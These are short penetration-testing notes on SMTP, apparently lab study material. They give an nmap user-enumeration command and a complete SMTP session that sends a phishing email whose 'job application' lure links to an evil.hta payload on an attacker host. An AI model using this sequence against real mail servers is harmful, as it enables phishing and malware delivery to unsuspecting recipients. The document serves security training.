25 - SMTP

Not so juicy tho

1. To find Users: nmap --script smtp-enum-users.nse -p 25,465,587 <IP>

2. If Anonymous Login is allowed we can use Netcat to send Phishing emails through SMTP.

How to use SMTP to send Email?

HELO google.com
250 VICTIM Hello [192.168.45.187]
MAIL FROM:<poti@hacker.com>
250 2.1.0 poti@hacker.com....Sender OK
RCPT TO:<lhale@victim>
250 2.1.5 lhale@victim 
DATA
354 Start mail input; end with <CRLF>.<CRLF>
From: poti@hacker.com
To: lhale@victim
Subject: job application
job application click this link: http://<KALI-IP>/evil.hta
.
250 2.6.0 <VICTIMhKG121IHZHq8j00000006@VICTIM> Queued mail for delivery
QUIT
221 2.0.0 VICTIM Service closing transmission channel

Sending Email with Netcat | Linux Journal

What do Netcat, SMTP and self XSS have in common? Stored XSSMedium

Reason: 354 Start mail input; end with <CRLF>.<CRLF - forum.mailenable.com